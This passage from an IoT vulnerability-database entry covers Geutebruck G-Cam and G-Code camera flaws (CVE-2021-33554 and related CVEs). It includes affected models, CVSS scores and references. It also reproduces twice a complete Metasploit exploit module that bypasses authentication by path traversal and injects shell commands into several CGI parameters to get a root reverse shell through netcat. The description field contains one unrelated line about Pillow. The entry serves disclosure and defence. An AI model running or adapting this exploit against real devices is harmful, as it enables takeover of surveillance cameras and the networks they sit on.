              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0850",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33554",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33554",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33554",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33554",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33554",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2084",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33554",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
